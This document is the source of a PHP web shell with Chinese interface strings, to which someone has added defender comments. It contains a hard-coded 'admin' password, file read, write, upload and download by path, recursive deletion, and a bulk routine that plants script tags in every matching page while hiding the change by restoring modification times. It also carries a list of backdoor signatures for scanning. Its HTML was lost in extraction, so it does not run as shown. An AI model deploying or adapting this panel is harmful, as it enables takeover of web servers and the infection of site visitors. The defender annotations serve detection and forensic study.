


// NOTE(review): this listing is the source of a PHP web shell (file manager, command
// runner, bulk file rewriter, port scanner) as republished on a web page. The opening
// PHP tag and the heredoc/HTML markup were lost in extraction, so it does not parse as shown.
// Hard-coded access password for the panel; the check that consumes it is not in this
// part of the listing. Defender note: a literal default credential next to
// set_time_limit(0) and a GB2312 header is a useful string cluster when hunting for
// copies of this file in a web root.
$password = "admin";// set the password

// Report fatal run-time errors only; warnings and notices are hidden.
error_reporting(E_ERROR);

// Pages are served as GB2312-encoded HTML.
header("content-Type: text/html; charset=gb2312");

// Remove the script execution time limit so the recursive directory walks further down can run to completion.
set_time_limit(0);

/**
 * Recursively remove backslash escaping from the string values of an array.
 *
 * Only entries whose key contains a lower-case character or is integer-like are
 * processed; the keys 'argc' and 'argv' are always skipped. Nested arrays are
 * handled by recursion.
 *
 * NOTE(review): presumably meant to undo magic_quotes_gpc on the request arrays;
 * the call site is not in this part of the listing, confirm against the caller.
 *
 * @param array $array Array to clean; passed by reference and modified in place.
 * @return array The same array after cleaning.
 */
function Root_GP(&$array)

{

// each() walks the array via its internal pointer; it was removed in PHP 8, which dates this code.
while(list($key,$var) = each($array))

{

// Skip keys that are entirely upper-case and not integer-like, plus argc/argv.
if((strtoupper($key) != $key || ''.intval($key) == "$key") && $key != 'argc' && $key != 'argv')

{

if(is_string($var)) $array[$key] = stripslashes($var);

if(is_array($var)) $array[$key] = Root_GP($var);

}

}

return $array;

}

function Root_CSS()

{

print<<
\n

END;

return false;

}

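// File management ("文件管理"): an in-memory ZIP builder plus read / write / upload / download / delete helpers used by the file-browser panel.
// Defender note: every helper below suppresses errors with @ and takes its paths from the caller unchecked, so the web-server account's file permissions are the only limit on what it can reach.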

class packdir

{

var $out = '';

var $datasec = array();

var $ctrl_dir = array();

var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";

var $old_offset = 0;

function packdir($array)

{

if(@function_exists('gzcompress'))

{

for($n = 0;$n < count($array);$n++)

{

$array[$n] = urldecode($array[$n]);

$fp = @fopen($array[$n], 'r');

$filecode = @fread($fp, @filesize($array[$n]));

@fclose($fp);

$this -> filezip($filecode,basename($array[$n]));

}

@closedir($zhizhen);

$this->out = $this->packfile();

return true;

}

return false;

}

function at($atunix = 0)

{

$unixarr = ($atunix == 0) ? getdate() : getdate($atunix);

if ($unixarr['year'] < 1980)

{

$unixarr['year'] = 1980;

$unixarr['mon'] = 1;

$unixarr['mday'] = 1;

$unixarr['hours'] = 0;

$unixarr['minutes'] = 0;

$unixarr['seconds'] = 0;

}

return (($unixarr['year'] - 1980) << 25) | ($unixarr['mon'] << 21) | ($unixarr['mday'] << 16) | ($unixarr['hours'] << 11) | ($unixarr['minutes'] << 5) | ($unixarr['seconds'] >> 1);

}

function filezip($data, $name, $time = 0)

{

$name = str_replace('\\', '/', $name);

$dtime = dechex($this->at($time));

$hexdtime = '\x'.$dtime[6].$dtime[7].'\x'.$dtime[4].$dtime[5].'\x'.$dtime[2].$dtime[3].'\x'.$dtime[0].$dtime[1];

eval('$hexdtime = "' . $hexdtime . '";');

$fr = "\x50\x4b\x03\x04";

$fr .= "\x14\x00";

$fr .= "\x00\x00";

$fr .= "\x08\x00";

$fr .= $hexdtime;

$unc_len = strlen($data);

$crc = crc32($data);

$zdata = gzcompress($data);

$c_len = strlen($zdata);

$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);

$fr .= pack('V', $crc);

$fr .= pack('V', $c_len);

$fr .= pack('V', $unc_len);

$fr .= pack('v', strlen($name));

$fr .= pack('v', 0);

$fr .= $name;

$fr .= $zdata;

$fr .= pack('V', $crc);

$fr .= pack('V', $c_len);

$fr .= pack('V', $unc_len);

$this -> datasec[] = $fr;

$new_offset = strlen(implode('', $this->datasec));

$cdrec = "\x50\x4b\x01\x02";

$cdrec .= "\x00\x00";

$cdrec .= "\x14\x00";

$cdrec .= "\x00\x00";

$cdrec .= "\x08\x00";

$cdrec .= $hexdtime;

$cdrec .= pack('V', $crc);

$cdrec .= pack('V', $c_len);

$cdrec .= pack('V', $unc_len);

$cdrec .= pack('v', strlen($name) );

$cdrec .= pack('v', 0 );

$cdrec .= pack('v', 0 );

$cdrec .= pack('v', 0 );

$cdrec .= pack('v', 0 );

$cdrec .= pack('V', 32 );

$cdrec .= pack('V', $this -> old_offset );

$this -> old_offset = $new_offset;

$cdrec .= $name;

$this -> ctrl_dir[] = $cdrec;

}

function packfile()

{

$data = implode('', $this -> datasec);

$ctrldir = implode('', $this -> ctrl_dir);

return $data.$ctrldir.$this -> eof_ctrl_dir.pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)).pack('V', strlen($ctrldir)).pack('V', strlen($data))."\x00\x00";

}

}

/**
 * Normalise path separators: every backslash becomes a forward slash, then
 * each "//" pair is collapsed to "/" in a single left-to-right pass.
 *
 * @param string $string Path to normalise.
 * @return string Path with forward slashes only.
 */
function File_Str($string)
{
    $forwardSlashed = str_replace('\\', '/', $string);

    // One pass only: a run of three slashes still leaves a double slash behind.
    $collapsed = str_replace('//', '/', $forwardSlashed);

    return $collapsed;
}

/**
 * Format a byte count for display, rounded to two decimals.
 *
 * Thresholds are strict: exactly 1024 is still shown in bytes.
 *
 * @param int|float $size Size in bytes.
 * @return string Size followed by ' G', ' M', ' K' or ' B'.
 */
function File_Size($size)
{
    if ($size > 1073741824) {
        return round($size / 1073741824 * 100) / 100 . ' G';
    }

    if ($size > 1048576) {
        return round($size / 1048576 * 100) / 100 . ' M';
    }

    if ($size > 1024) {
        return round($size / 1024 * 100) / 100 . ' K';
    }

    return $size . ' B';
}

/**
 * Estimate the web root on disk by removing the script's URL directory
 * (PHP_SELF without its last path segment) from the end of the real path
 * of the current working directory.
 *
 * @return string Normalised path produced by File_Str().
 */
function File_Mode()
{
    $workingDir = realpath('./');
    $scriptUrl = $_SERVER['PHP_SELF'];

    // Directory part of the script URL, e.g. "/sub" for "/sub/page.php".
    $urlDir = substr($scriptUrl, 0, strrpos($scriptUrl, '/'));

    $rootLength = strlen($workingDir) - strlen($urlDir);

    return File_Str(substr($workingDir, 0, $rootLength));
}

/**
 * Read a whole file in binary mode and return its contents.
 *
 * All errors are suppressed with @, so a missing or unreadable file does not
 * raise anything visible; the return value is whatever fread() produced.
 *
 * @param string $filename Path to read; not validated here.
 * @return string|false File contents, or the failed fread() result.
 */
function File_Read($filename)

{

$handle = @fopen($filename,"rb");

// Reads filesize() bytes in one call.
$filecode = @fread($handle,@filesize($filename));

@fclose($handle);

return $filecode;

}

/**
 * Write data to a file, retrying once after loosening the file's permissions.
 *
 * Defender note: the chmod to 0666 on a failed write means files touched by
 * this helper can be left world-writable; unexpected 0666 modes on site files
 * are worth including in an integrity sweep.
 *
 * @param string $filename Target path; not validated here.
 * @param string $filecode Data to write.
 * @param string $filemode fopen() mode; callers in this listing pass 'wb'.
 * @return bool True unless both write attempts reported failure.
 */
function File_Write($filename,$filecode,$filemode)

{

$key = true;

$handle = @fopen($filename,$filemode);

// A falsy fwrite() result (failure, or zero bytes written) triggers the retry path.
if(!@fwrite($handle,$filecode))

{

@chmod($filename,0666);

// The retry writes through the same handle that was opened above.
$key = @fwrite($handle,$filecode) ? true : false;

}

@fclose($handle);

return $key;

}

/**
 * Place an uploaded file at a destination path.
 *
 * Tries copy() first and falls back to move_uploaded_file(). Neither the
 * destination path nor the file name or type is checked here, and the callers
 * in this listing build the destination from request fields.
 *
 * Defender note: this is an unrestricted upload primitive. Disabling script
 * execution in writable directories, and alerting on new executable-type files
 * under the web root, limit what a file placed this way can do.
 *
 * @param string $filea Source path (the upload's temporary file in the visible callers).
 * @param string $fileb Destination path.
 * @return bool True if either copy() or move_uploaded_file() succeeded.
 */
function File_Up($filea,$fileb)

{

$key = @copy($filea,$fileb) ? true : false;

if(!$key) $key = @move_uploaded_file($filea,$fileb) ? true : false;

return $key;

}

/**
 * Stream a file to the client as an attachment and end the request.
 *
 * The Content-type is built from the file extension and the name is placed in
 * Content-Disposition unquoted. In this listing File_a() passes $_GET['df']
 * straight through, so any file readable by the web-server account can be
 * fetched by path.
 *
 * Defender note: requests carrying a "df=" parameter whose value is a
 * filesystem path are a lead when reviewing access logs for use of this panel.
 *
 * @param string $filename Path of the file to send; not validated here.
 * @return false|void False when the file does not exist; otherwise the script exits.
 */
function File_Down($filename)

{

if(!file_exists($filename)) return false;

$filedown = basename($filename);

// The last dot-separated segment of the name is used as the extension.
$array = explode('.', $filedown);

$arrayend = array_pop($array);

header('Content-type: application/x-'.$arrayend);

header('Content-Disposition: attachment; filename='.$filedown);

header('Content-Length: '.filesize($filename));

@readfile($filename);

exit;

}

/**
 * Recursively delete a directory and everything beneath it.
 *
 * Every entry is chmod-ed to 0777 before it is removed, and all errors are
 * suppressed. In this listing File_a() calls it with $_GET['dd'] unmodified.
 *
 * Defender note: there is no confirmation and no path restriction, so
 * off-host backups are the only recovery path after this has run.
 *
 * @param string $deldir Directory to remove; not validated here.
 * @return bool True if the final rmdir() succeeded, false if the directory
 *              could not be opened or removed.
 */
function File_Deltree($deldir)

{

if(($mydir = @opendir($deldir)) == NULL) return false;

while(false !== ($file = @readdir($mydir)))

{

$name = File_Str($deldir.'/'.$file);

// Sub-directories are emptied by recursion; '.' and '..' are skipped.
if((is_dir($name)) && ($file!='.') && ($file!='..')){@chmod($name,0777);File_Deltree($name);}

if(is_file($name)){@chmod($name,0777);@unlink($name);}

}

@closedir($mydir);

@chmod($deldir,0777);

return @rmdir($deldir) ? true : false;

}

function File_Act($array,$actall,$inver)

{

if(($count = count($array)) == 0) return '请选择文件';

if($actall == 'e')

{

$zip = new packdir;

if($zip->packdir($array)){$spider = $zip->out;header("Content-type: application/unknown");header("Accept-Ranges: bytes");header("Content-length: ".strlen($spider));header("Content-disposition: attachment; filename=".$inver.";");echo $spider;exit;}

return '打包所选文件失败';

}

$i = 0;

while($i < $count)

{

$array[$i] = urldecode($array[$i]);

switch($actall)

{

case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '路径错误'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = '复制到'.$inver.'目录'; break;

case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = '删除'; break;

case "c" : if(!eregi("^[0-7]{4}$",$inver)) return '属性值错误'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '属性修改为'.$inver; break;

case "d" : @touch($array[$i],strtotime($inver)); $msg = '修改时间为'.$inver; break;

}

$i++;

}

return '所选文件'.$msg.'完毕';

}

function File_Edit($filepath,$filename,$dim = '')

{

$THIS_DIR = urlencode($filepath);

$THIS_FILE = File_Str($filepath.'/'.$filename);

if(file_exists($THIS_FILE)){$FILE_TIME = @date('Y-m-d H:i:s',filemtime($THIS_FILE));$FILE_CODE = htmlspecialchars(File_Read($THIS_FILE));}

else {$FILE_TIME = @date('Y-m-d H:i:s',time());$FILE_CODE = '';}

print<<


查找内容:









文件修改时间








END;

}

function File_Soup($p)

{

$THIS_DIR = urlencode($p);

$UP_SIZE = get_cfg_var('upload_max_filesize');

$MSG_BOX = '单个附件允许大小:'.$UP_SIZE.', 改名格式(new.php),如为空,则保持原文件名.';

if(!empty($_POST['updir']))

{

if(count($_FILES['soup']) >= 1)

{

$i = 0;

foreach ($_FILES['soup']['error'] as $key => $error)

{

if ($error == UPLOAD_ERR_OK)

{

$souptmp = $_FILES['soup']['tmp_name'][$key];

if(!empty($_POST['reup'][$i]))$soupname = $_POST['reup'][$i]; else $soupname = $_FILES['soup']['name'][$key];

$MSG[$i] = File_Up($souptmp,File_Str($_POST['updir'].'/'.$soupname)) ? $soupname.'上传成功' : $soupname.'上传失败';

}

$i++;

}

}

else

{

$MSG_BOX = '请选择文件';

}

}

print<<
{$MSG_BOX}




上传到目录:


附件1 改名 $MSG[0]


附件2 改名 $MSG[1]


附件3 改名 $MSG[2]


附件4 改名 $MSG[3]


附件5 改名 $MSG[4]


附件6 改名 $MSG[5]


附件7 改名 $MSG[6]


附件8 改名 $MSG[7]






END;

}

function File_a($p)

{

if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/';

$MSG_BOX = '等待消息队列';

$UP_DIR = urlencode(File_Str($p.'/..'));

$REAL_DIR = File_Str(realpath($p));

$FILE_DIR = File_Str(dirname(__FILE__));

$ROOT_DIR = File_Mode();

$THIS_DIR = urlencode(File_Str($REAL_DIR));

$NUM_D = 0;

$NUM_F = 0;

if(!empty($_POST['pfn'])){$intime = @strtotime($_POST['mtime']);$MSG_BOX = File_Write($_POST['pfn'],$_POST['pfc'],'wb') ? '编辑文件 '.$_POST['pfn'].' 成功' : '编辑文件 '.$_POST['pfn'].' 失败';@touch($_POST['pfn'],$intime);}

if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST['ufn']; else $upfilename = $_FILES['ufp']['name'];$MSG_BOX = File_Up($_FILES['ufp']['tmp_name'],File_Str($REAL_DIR.'/'.$upfilename)) ? '上传文件 '.$upfilename.' 成功' : '上传文件 '.$upfilename.' 失败';}

if(!empty($_POST['actall'])){$MSG_BOX = File_Act($_POST['files'],$_POST['actall'],$_POST['inver']);}

if(isset($_GET['md'])){$modfile = File_Str($REAL_DIR.'/'.$_GET['mk']); if(!eregi("^[0-7]{4}$",$_GET['md'])) $MSG_BOX = '属性值错误'; else $MSG_BOX = @chmod($modfile,base_convert($_GET['md'],8,10)) ? '修改 '.$modfile.' 属性为 '.$_GET['md'].' 成功' : '修改 '.$modfile.' 属性为 '.$_GET['md'].' 失败';}

if(isset($_GET['mn'])){$MSG_BOX = @rename(File_Str($REAL_DIR.'/'.$_GET['mn']),File_Str($REAL_DIR.'/'.$_GET['rn'])) ? '改名 '.$_GET['mn'].' 为 '.$_GET['rn'].' 成功' : '改名 '.$_GET['mn'].' 为 '.$_GET['rn'].' 失败';}

if(isset($_GET['dn'])){$MSG_BOX = @mkdir(File_Str($REAL_DIR.'/'.$_GET['dn']),0777) ? '创建目录 '.$_GET['dn'].' 成功' : '创建目录 '.$_GET['dn'].' 失败';}

if(isset($_GET['dd'])){$MSG_BOX = File_Deltree($_GET['dd']) ? '删除目录 '.$_GET['dd'].' 成功' : '删除目录 '.$_GET['dd'].' 失败';}

if(isset($_GET['df'])){if(!File_Down($_GET['df'])) $MSG_BOX = '下载文件不存在';}

Root_CSS();

print<<


{$MSG_BOX}












































END;

if(($h_d = @opendir($p)) == NULL) return false;

while(false !== ($Filename = @readdir($h_d)))

{

if($Filename == '.' or $Filename == '..') continue;

$Filepath = File_Str($REAL_DIR.'/'.$Filename);

if(is_dir($Filepath))

{

$Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4);

$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));

$Filepath = urlencode($Filepath);

echo "\r\n".' ';

$Filename = urlencode($Filename);

echo ' ';

echo ' ';

echo ' ';

echo ' '."\r\n";

$NUM_D++;

}

}

@rewinddir($h_d);

while(false !== ($Filename = @readdir($h_d)))

{

if($Filename == '.' or $Filename == '..') continue;

$Filepath = File_Str($REAL_DIR.'/'.$Filename);

if(!is_dir($Filepath))

{

$Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$Filepath);

$Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4);

$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));

$Filesize = File_Size(@filesize($Filepath));

if($Filepath == File_Str(__FILE__)) $fname = ''.$Filename.''; else $fname = $Filename;

echo "\r\n".' ';

$Filepath = urlencode($Filepath);

$Filename = urlencode($Filename);

echo ' ';

echo ' ';

echo ' ';

echo ' '."\r\n";

$NUM_F++;

}

}

@closedir($h_d);

if(!$Filetime) $Filetime = '2009-01-01 00:00:00';

print<<
上级目录 操作 属性 修改时间 大小
0 '.$Filename.' 删除 ';

echo ' 改名
'.$Fileperm.' '.$Filetime.'
'.$fname.' 编辑 ';

echo ' 改名
'.$Fileperm.''.$Filetime.' '.$Filesize.'


















目录({$NUM_D}) / 文件({$NUM_F})




END;

return true;

}

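// Bulk code injection ("批量挂马"): walks a directory tree and writes operator-supplied markup into every file whose name matches a pattern, optionally restoring each file's modification time afterwards.
// Defender note: because the mtime can be restored, modification time alone will not reveal tampered files; compare content hashes against a known-good deployment, and look for the same foreign script or iframe tag repeated across many pages.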

function Guama_Pass($length)

{

$possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";

$str = "";

while(strlen($str) < $length) $str .= substr($possible,(rand() % strlen($possible)),1);

return $str;

}

function Guama_Make($codea,$codeb,$codec)

{

return str_replace($codea,Guama_Pass($codeb),$codec);

}

function Guama_Auto($gp,$gt,$gl,$gc,$gm,$gf,$gi,$gk,$gd,$gb)

{

if(($h_d = @opendir($gp)) == NULL) return false;

if($gm > 12) return false;

while(false !== ($Filename = @readdir($h_d)))

{

if($Filename == '.' || $Filename == '..') continue;

if($gl != ''){if(eregi($gl,$Filename)) continue;}

$Filepath = File_Str($gp.'/'.$Filename);

if(is_dir($Filepath) && $gb) Guama_Auto($Filepath,$gt,$gl,$gc,$gm,$gf,$gi,$gk,$gd,$gb);

if(eregi($gt,$Filename))

{

$fc = File_Read($Filepath);

if(($gk != '') && (stristr($fc,chop($gk)))) continue;

if(($gf != '') && ($gm != 0)) $gcm = Guama_Make($gf,$gm,$gc); else $gcm = $gc;

if($gd) $ftime = @filemtime($Filepath);

if($gi == 'a'){if(!stristr($fc,'')) continue; $fcm = str_replace('',"\r\n".$gcm."\r\n".'',$fc); $fcm = str_replace('',"\r\n".$gcm."\r\n".'',$fcm);}

if($gi == 'b') $fcm = $gcm."\r\n".$fc;

if($gi == 'c') $fcm = $fc."\r\n".$gcm;

echo File_Write($Filepath,$fcm,'wb') ? '成功:'.$Filepath.'

'."\r\n" : '失败:'.$Filepath.'

'."\r\n";

if($gd) @touch($Filepath,$ftime);

ob_flush();

flush();

}

}

@closedir($h_d);

return true;

}

function Guama_b()

{

if((!empty($_POST['gp'])) && (!empty($_POST['gt'])) && (!empty($_POST['gc'])))

{

echo '
';

$_POST['gt'] = str_replace('.','\\.',$_POST['gt']);

if($_POST['inout'] == 'a') $_POST['gl'] = str_replace('.','\\.',$_POST['gl']); else $_POST['gl'] = '';

if(stristr($_POST['gc'],'[-') && stristr($_POST['gc'],'-]'))

{

$temp = explode('[-',$_POST['gc']);

$gk = $temp[0];

preg_match_all("/\[\-([^~]*?)\-\]/i",$_POST['gc'],$nc);

if(!eregi("^[0-9]{1,2}$",$nc[1][0])){echo '异常终止'; return false;}

$gm = (int)$nc[1][0];

$gf = $nc[0][0];

}

else

{

$gk = $_POST['gc'];

$gm = 0;

$gf = '';

}

if(!isset($_POST['gx'])) $gk = '';

$gd = isset($_POST['gd']) ? true : false;

$gb = ($_POST['gb'] == 'a') ? true : false;

echo Guama_Auto($_POST['gp'],$_POST['gt'],$_POST['gl'],$_POST['gc'],$gm,$gf,$_POST['gi'],$gk,$gd,$gb) ? '挂马完毕' : '异常终止';

echo '
';

return false;

}

$FILE_DIR = File_Str(dirname(__FILE__));

$ROOT_DIR = File_Mode();

print<<




挂马路径



文件类型



过滤对象

开启 关闭


挂马代码

挂马变形说明: 程序自动寻找[-6-]标签,替换为随机字符,6表示六位随机字符,最大12位,如果不变形可以不加[-6-]标签.

挂上示例: <script language=javascript src="http://www.baidu.com/ad.js?EMTDSU"></script>


插入</head>标签之前

插入文件最顶端

插入文件最末尾


智能过滤重复代码 保持文件修改时间不变


将挂马应用于该文件夹,子文件夹和文件

仅将挂马应用于该文件夹






END;

return true;

}

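// Bulk removal ("批量清马"): deletes a given string from every matching file under a directory, with the same optional restore of the file's modification time.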

function Qingma_Auto($qp,$qt,$qc,$qd,$qb)

{

if(($h_d = @opendir($qp)) == NULL) return false;

while(false !== ($Filename = @readdir($h_d)))

{

if($Filename == '.' || $Filename == '..') continue;

$Filepath = File_Str($qp.'/'.$Filename);

if(is_dir($Filepath) && $qb) Qingma_Auto($Filepath,$qt,$qc,$qd,$qb);

if(eregi($qt,$Filename))

{

$ic = File_Read($Filepath);

if(!stristr($ic,$qc)) continue;

$ic = str_replace($qc,'',$ic);

if($qd) $ftime = @filemtime($Filepath);

echo File_Write($Filepath,$ic,'wb') ? '成功:'.$Filepath.'

'."\r\n" : '失败:'.$Filepath.'

'."\r\n";

if($qd) @touch($Filepath,$ftime);

ob_flush();

flush();

}

}

@closedir($h_d);

return true;

}

function Qingma_c()

{

if((!empty($_POST['qp'])) && (!empty($_POST['qt'])) && (!empty($_POST['qc'])))

{

echo '
';

$qt = str_replace('.','\\.',$_POST['qt']);

$qd = isset($_POST['qd']) ? true : false;

$qb = ($_POST['qb'] == 'a') ? true : false;

echo Qingma_Auto($_POST['qp'],$qt,$_POST['qc'],$qd,$qb) ? '清马完毕' : '异常终止';

echo '
';

return false;

}

$FILE_DIR = File_Str(dirname(__FILE__));

$ROOT_DIR = File_Mode();

print<<




清马路径



文件类型



清除代码


保持文件修改时间不变


将清马应用于该文件夹,子文件夹和文件

仅将清马应用于该文件夹






END;

return true;

}

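// Bulk replace ("批量替换"): across matching files, replaces either a literal string or every href value that matches a pattern, again with an optional mtime restore.
// Defender note: the href mode rewrites link targets in place, so a content integrity check should cover link destinations as well as injected tags.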

function Tihuan_Auto($tp,$tt,$th,$tca,$tcb,$td,$tb)

{

if(($h_d = @opendir($tp)) == NULL) return false;

while(false !== ($Filename = @readdir($h_d)))

{

if($Filename == '.' || $Filename == '..') continue;

$Filepath = File_Str($tp.'/'.$Filename);

if(is_dir($Filepath) && $tb) Tihuan_Auto($Filepath,$tt,$th,$tca,$tcb,$td,$tb);

$doing = false;

if(eregi($tt,$Filename))

{

$ic = File_Read($Filepath);

if($th)

{

if(!stristr($ic,$tca)) continue;

$ic = str_replace($tca,$tcb,$ic);

$doing = true;

}

else

{

preg_match_all("/href\=\"([^~]*?)\"/i",$ic,$nc);

for($i = 0;$i < count($nc[1]);$i++){if(eregi($tca,$nc[1][$i])){$ic = str_replace($nc[1][$i],$tcb,$ic);$doing = true;}}

}

if($td) $ftime = @filemtime($Filepath);

if($doing) echo File_Write($Filepath,$ic,'wb') ? '成功:'.$Filepath.'

'."\r\n" : '失败:'.$Filepath.'

'."\r\n";

if($td) @touch($Filepath,$ftime);

ob_flush();

flush();

}

}

@closedir($h_d);

return true;

}

function Tihuan_d()

{

if((!empty($_POST['tp'])) && (!empty($_POST['tt'])))

{

echo '
';

$tt = str_replace('.','\\.',$_POST['tt']);

$td = isset($_POST['td']) ? true : false;

$tb = ($_POST['tb'] == 'a') ? true : false;

$th = ($_POST['th'] == 'a') ? true : false;

if($th) $_POST['tca'] = str_replace('.','\\.',$_POST['tca']);

echo Tihuan_Auto($_POST['tp'],$tt,$th,$_POST['tca'],$_POST['tcb'],$td,$tb) ? '替换完毕' : '异常终止';

echo '
';

return false;

}

$FILE_DIR = File_Str(dirname(__FILE__));

$ROOT_DIR = File_Mode();

print<<




替换路径



文件类型



替换文件中的指定内容 替换文件中的下载地址

查找内容

替换成为


保持文件修改时间不变


将替换应用于该文件夹,子文件夹和文件

仅将替换应用于该文件夹






END;

return true;

}

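// Web-shell scan ("扫描木马"): flags files that contain any of a fixed list of substrings, using a plain case-insensitive substring test.
// Defender note: the scan explicitly skips this file itself, and a substring list of this kind is easy to evade; it is no substitute for comparing the web root against a clean deployment.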

function Antivirus_Auto($sp,$features,$st,$sb)

{

if(($h_d = @opendir($sp)) == NULL) return false;

$ROOT_DIR = File_Mode();

while(false !== ($Filename = @readdir($h_d)))

{

if($Filename == '.' || $Filename == '..') continue;

$Filepath = File_Str($sp.'/'.$Filename);

if(is_dir($Filepath) && $sb) Antivirus_Auto($Filepath,$features,$st);

if(eregi($st,$Filename))

{

if($Filepath == File_Str(__FILE__)) continue;

$ic = File_Read($Filepath);

foreach($features as $var => $key)

{

if(stristr($ic,$key))

{

$Fileurls = str_replace($ROOT_DIR,'http://'.$_SERVER['SERVER_NAME'].'/',$Filepath);

$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));

echo ' '.$Filepath.'

编辑 删除 】 ';

echo ' 【 '.$Filetime.' 】 '.$var.'

'."\r\n";

break;

}

}

ob_flush();

flush();

}

}

@closedir($h_d);

return true;

}

function Antivirus_e()

{

if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo '删除成功';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? '删除成功' : '删除失败';} return false;}

if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; }

$SCAN_DIR = isset($_POST['sp']) ? $_POST['sp'] : File_Mode();

$features_php = array('php大马特征1'=>'cha88.cn','php大马特征2'=>'->read()','php大马特征3'=>'readdir(','危险MYSQL语句4'=>'returns string soname','php加密大马特征5'=>'eval(gzinflate(','php加密大马特征6'=>'eval(base64_decode(','php一句话特征7'=>'eval($_','php一句话特征8'=>'eval ($_','php上传后门特征9'=>'copy($_FILES','php上传后门特征10'=>'copy ($_FILES','php上传后门特征11'=>'move_uploaded_file($_FILES','php上传后门特征12'=>'move_uploaded_file ($_FILES','php小马特征13'=>'str_replace(\'\\\\\',\'/\',');

$features_asx = array('asp小马特征1'=>'绝对路径','asp小马特征2'=>'输入马的内容','asp小马特征3'=>'fso.createtextfile(path,true)','asp一句话特征4'=>'<%execute(request','asp一句话特征5'=>'<%eval request','asp一句话特征6'=>'execute session(','asp数据库后门特征7'=>'--Created!','asp大马特征8'=>'WScript.Shell','asp大小马特征9'=>'<%@ LANGUAGE = VBScript.Encode %>','aspx大马特征10'=>'www.rootkit.net.cn','aspx大马特征11'=>'Process.GetProcesses','aspx大马特征12'=>'lake2');

print<<


扫描路径


木马类型 php木马

asp+aspx木马


将扫马应用于该文件夹,子文件夹和文件

仅将扫马应用于该文件夹






END;

if(!empty($_POST['sp']))

{

echo '
';

if(isset($_POST['stphp'])){$features_all = $features_php; $st = '\.php|\.inc|\;';}

if(isset($_POST['stasx'])){$features_all = $features_asx; $st = '\.asp|\.asa|\.cer|\.aspx|\.ascx|\;';}

if(isset($_POST['stphp']) && isset($_POST['stasx'])){$features_all = array_merge($features_php,$features_asx); $st = '\.php|\.inc|\.asp|\.asa|\.cer|\.aspx|\.ascx|\;';}

$sb = ($_POST['sb'] == 'a') ? true : false;

echo Antivirus_Auto($_POST['sp'],$features_all,$st,$sb) ? '扫描完毕' : '异常终止';

echo '
';

}

return true;

}

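// File search ("搜索文件"): finds files under a directory by name or by content substring, skipping the listed media and archive extensions.
// Defender note: the default keyword is 'config', which suggests the search is aimed at configuration files; credentials stored there should be treated as exposed on any host where this panel was found.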

function Findfile_Auto($sfp,$sfc,$sft,$sff,$sfb)

{

//echo $sfp.'

'.$sfc.'

'.$sft.'

'.$sff.'

'.$sfb;

if(($h_d = @opendir($sfp)) == NULL) return false;

while(false !== ($Filename = @readdir($h_d)))

{

if($Filename == '.' || $Filename == '..') continue;

if(eregi($sft,$Filename)) continue;

$Filepath = File_Str($sfp.'/'.$Filename);

if(is_dir($Filepath) && $sfb) Findfile_Auto($Filepath,$sfc,$sft,$sff,$sfb);

if($sff)

{

if(stristr($Filename,$sfc))

{

echo ' '.$Filepath.'

'."\r\n";

ob_flush();

flush();

}

}

else

{

$File_code = File_Read($Filepath);

if(stristr($File_code,$sfc))

{

echo ' '.$Filepath.'

'."\r\n";

ob_flush();

flush();

}

}

}

@closedir($h_d);

return true;

}

function Findfile_j()

{

if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo '删除成功';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? '删除成功' : '删除失败';} return false;}

if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; }

$SCAN_DIR = isset($_POST['sfp']) ? $_POST['sfp'] : File_Mode();

$SCAN_CODE = isset($_POST['sfc']) ? $_POST['sfc'] : 'config';

$SCAN_TYPE = isset($_POST['sft']) ? $_POST['sft'] : '.mp3|.mp4|.avi|.swf|.jpg|.gif|.png|.bmp|.gho|.rar|.exe|.zip';

print<<


扫描路径


过滤文件


关键字串

搜索文件名

搜索包含文字


将搜索应用于该文件夹,子文件夹和文件

仅将搜索应用于该文件夹






END;

if((!empty($_POST['sfp'])) && (!empty($_POST['sfc'])))

{

echo '
';

$_POST['sft'] = str_replace('.','\\.',$_POST['sft']);

$sff = ($_POST['sff'] == 'a') ? true : false;

$sfb = ($_POST['sfb'] == 'a') ? true : false;

echo Findfile_Auto($_POST['sfp'],$_POST['sfc'],$_POST['sft'],$sff,$sfb) ? '搜索完毕' : '异常终止';

echo '
';

}

return true;

}

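// System information ("系统信息"): reports server identity, PHP configuration, the disable_functions list and which extensions are available.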

/**
 * Return a php.ini setting in display form.
 *
 * switch compares loosely, so a value that compares equal to 0 is shown as
 * "No", one that compares equal to 1 as "Yes", and anything else is returned
 * unchanged.
 *
 * @param string $varname Name of the configuration option.
 * @return mixed "No", "Yes", or the raw get_cfg_var() result.
 */
function Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break;}}

/**
 * Report whether a function is defined in this PHP build.
 *
 * @param string $funName Function name to probe.
 * @return string "Yes" if function_exists() is true, otherwise "No".
 */
function Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";}

function Info_f()

{

$dis_func = get_cfg_var("disable_functions");

$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";

